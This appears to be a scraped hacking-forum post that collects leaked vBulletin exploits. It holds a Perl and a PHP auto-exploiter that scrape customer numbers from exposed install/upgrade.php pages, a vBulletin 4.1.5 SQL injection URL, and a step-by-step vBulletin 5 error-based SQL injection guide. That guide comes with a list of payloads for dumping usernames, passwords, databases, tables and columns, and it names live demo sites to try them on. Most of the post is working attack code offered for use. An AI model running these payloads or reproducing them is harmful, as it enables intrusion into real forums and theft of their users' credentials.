Question all 0day 2013 vbulletin leaked -_- fuck script kiddies

vBulletin x.x.x Customer Area 0day PHP Code: Bulletin x.x.x Customer Area 0day Perl script got  leaked  so decided to post the perl script here Code:#!/usr/bin/perluse LWP::UserAgent; use HTTP::Request::Common; system('cls');system('title vBulletin Install Auto Exploiter'); print "\n ---------------------------------------"; print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n"; print " ---------------------------------------\n"; print " + d4tabase.com -+- d4tabase.com + "; print "\n ---------------------------------------\n"; print " coded by n0tch shoutz d4tabase crew "; print "\n ---------------------------------------\n"; if($#ARGV == -1 or $#ARGV > 0){ print "\n usage: ./vBulletin.pl domain (without http://) \n\n"; exit; } $domain = $ARGV[0];$install_dir = "install";$full_domain = "http://$domain/$install_dir/upgrade.php";chop($domain); &search; sub search{$url = $full_domain;$lwp = LWP::UserAgent->new();$lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");$request = $lwp->post($url, ["searchHash" => "Search"]); print " Searching $domain ----\n "; if ($request->content =~ /CUSTNUMBER = \"(.+)\";/) { print "Result : $1\n"; } else { print "Hash: Hash not found!\n"; } } php exploit - -------------------- <!--?php set_time_limit(0); if($argc < 2) {     echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;     exit; } $URL = $argv[1];$arr = parse_url($URL); ### work with urlif(strpos($URL, '?')) die("Ohh, your URL is not valid"); if(substr($URL, -1, 1) != '/') $URL = $URL . '/'; if(!$arr['scheme']) $URL = 'http://' . $URL; $headers = get_headers($URL . '/install/upgrade.php'); if(substr($headers[0], 9, 3) == '200') {     $source = file_get_contents($URL . "/install/upgrade.php"); } elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {     if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php"); } else die("something went wrong..."); preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res); foreach ($res[1] as $hash) {     echo "Hash: " . $hash . PHP_EOL;     $fp = fopen("hash.txt", "a+");     fwrite($fp, $hash . PHP_EOL); }?> vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit PHP Code: vBulletin  4.1.x  /  5.x.x   Upgrade   0day  ExploitCreated by: BoxheadFound on: 08/22/2013Website: http://belegit.netExample:http://test.com/forum/install/upgrade.php   Website:           Customer ID:           Username:           Password:           Email:  vbulletin 4.1.5 attachment SQLI PHP Code: vbulletin 4.1.5 attachment SQLI examine variables came across sq-injection, as later found to be inherent to all vbulletin 4.1.5. Title: Vulnerability in vBulletin 4.1.5 Dork: Powered by Powered by vBulletin 4.1.5 Conditions: The account on the forum. Permission to attach files to messages / themes (attachments) Register -> go to the forum -> click a topic or if the board is, you can choose to create an article (the second option more work) -> at the bottom looking Attachments 'Manage Attachments' - > Open the window and setting "values ​​[f]" insert our SQL query. Example:Code:http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1)​)a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1After that, we see the standard error of the database offline, thus opening the source code of the page and see: Code: <!-- -  Database error in vBulletin 4.1.5 : Invalid SQL :              SELECT                  permissionsfrom ,  Hidden ,  setpublish ,  publishdate ,  userid              FROM ds23fSDdfsdf_cms_node              WHERE                  nodeid  = - 1599  or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a ); MySQL Error    :  Duplicate column Name  .1.49-3 '5 '  Error Number   :  1060 Request Date   :  Tuesday ,  February 12th  2013   @  01 : 12 : 33 PM Error Date     :  Tuesday ,  February 12th  2013   @  01 : 12 : 33 Address     :  127.0.0.1 Username       :  Hacker Classname      :  vB_Database MySQL Version  :  ->  vbulletin 5 sql injection PHP Code: vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day_ _ _ _ _____ _____ ___ _____ _ ______ | | | | | | | | | _ | | _ |/ _  |_ _| (_) | ___| | |_| | __ _ ___| | ___ _ __ _ _ __ __| | | |/' |_ _| |/' / /_  | |_ __ ___ _ __ _ _ __ | |_ ___ _ __ __ _ ___ | _ |/ _` |/ __| |/ / | | |/ _` | '__/ _` | | /| \ \/ / /| | _ | | | '__/ _ | |/ _` | '_ \| _/ _ \| '__/ _` |/ _ | | | | (_| | (__| <| |_| | (_| | | | (_| |  |_/ /> < |_/ / | | | | | | | (_) | | (_| | | | | || (_) | | | (_| | __/_| |_/__,_|___|_|___, |__,_|_| __,_| ___//_/\_\\___/\_| |_/ \_/_| \___/| |\__,_|_| |_\_| \___/|_| \__, |\___|__/ | _/ | __/ | |___/ |__/ |___/ ____ ____ __ _ ______ ____ ____ _ __/ __ )__ __/ / /__ / /_(_)___ / ____/ / __ / __ ____ ___ __| | / / __ / / / / / / _ / __/ / __  /___  / / / / / / / __ `/ / / / | |/ / /_/ / /_/ / / / __/ /_/ / / / / ____/ / / /_/ / /_/ / /_/ / /_/ / |___/_____/\__,_/_/_/\___/\__/_/_/ /_/ /_____/ \____/_____/\__,_/\__, / /____/ ************************************************** **************** #Title: vBulletin 5 SQL Injection > Beta Whatever #Author: 0x0A #Date: Dec 11, 2012 #Category: web application #Type: SQL Injection #Requirements: Firefox/Live HTTP Headers/ #Software Link: http://www.vbulletin.com/purchases/ http://www.vbulletin.com/features/ #Homepage: hackyard.net ***********.com #Version: 5 and above(not older versions) #Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux #Demo sites to try: http://www.sultantheme.com/vb5connectforum/ http://vb5connect.com/bb/ ************************************************** **************** ------------------------------------------------------------------- ------------------------------------------------------------------- How to ------------------------------------------------------------------- ------------------------------------------------------------------- ------------------------------------------------------------------- ================================================== ================= ------------------------------------------------------------------- [#1] First of all, make an account to the vBulletin 5 forum, http://img402.imageshack.us/img402/7784/69376730.png ------------------------------------------------------------------- ================================================== ================= ------------------------------------------------------------------- ------------------------------------------------------------------- ================================================== ================= ------------------------------------------------------------------- [#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/) http://imageshack.us/a/img12/305/89268702.png ------------------------------------------------------------------- ================================================== ================= ------------------------------------------------------------------- ------------------------------------------------------------------- ================================================== ================= ------------------------------------------------------------------- [#3] After that click the Like button, you will receive almost the same result as me. Go to the first POST record as the picture below and click Replay button, http://imageshack.us/a/img707/9990/68621087.png ------------------------------------------------------------------- ================================================== ================= ------------------------------------------------------------------- ------------------------------------------------------------------- ================================================== ================= ------------------------------------------------------------------- [#4] Then, on Send POST Content use this: ------------------------------------------------------------------------------------------------------------------------------------------------------------------- nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 ------------------------------------------------------------------------------------------------------------------------------------------------------------------- http://imageshack.us/a/img42/1590/26447606.png //Note that to keep the noteid value as it was as default in the POST Content. Instead you`ll get invalid noteid error.The following SQLi command will fetch out the first record from user table(username/password). ------------------------------------------------------------------- ================================================== ================= ------------------------------------------------------------------- ------------------------------------------------------------------- ================================================== ================= ------------------------------------------------------------------- [#Other SQLi Syntaxes]+------------------------------------------------------------------------------------------------------------------------------------------------------------------+ |Version(): +------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ |User(): +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ |Database(): +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ |Database Print: +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ |Table Count: +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ |Print Tables: +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ |Columns of selected table: +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ |Fetch Out Data: +------------------------------------------------------------------------------------------------------------------------------------------------------------------+ +------------------------------------------------------------------------------------------------------------------------------------------------------------------+nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338+------------------------------------------------------------------------------------------------------------------------------------------------------------------+ ------------------------------------------------------------------- ================================================== ================= ------------------------------------------------------------------- |  ' / -- (*) -- >*< >0<@< >>>@<<* >@>*<0<<< >*>>@<<<@<< >@>>0<<<*<<@< >*>>0<<@<<<@<<< >@>>*<<@<>*<<0<*< \*/ >0>>*<<@<>0><<*<@<< ___\\U//___ >*>>@><0<<*>>@><*<0<< |\\ | | \\| >@>>0<*<0>>@<<0<<<*<@<< | \\| | _(UU)_ >((*))_>0><*<0><@<<<0<*< |\ \| || / //||.*.*.*.|>>@<<*<<@>><0<<< Merry Xmas |\\_|_|&&_// ||*.*.*.*|_\\db//_ """"|'.'.'.|~~|.*.*.*| ____|_|'.'.'.|  |____|>>>>>>| ~~~~~~~~ '""""`------' ---------------------------------------------------- ==[ That`s it! ==[ Thanks, 0x0A! ==[ Romania----------------------------------------------------  http://pastebin.com/5hgWHFbj Nguồn: http://www.madleets.com/Thread-all-0day-2013-vbulletin-leaked-fuck-script-kiddies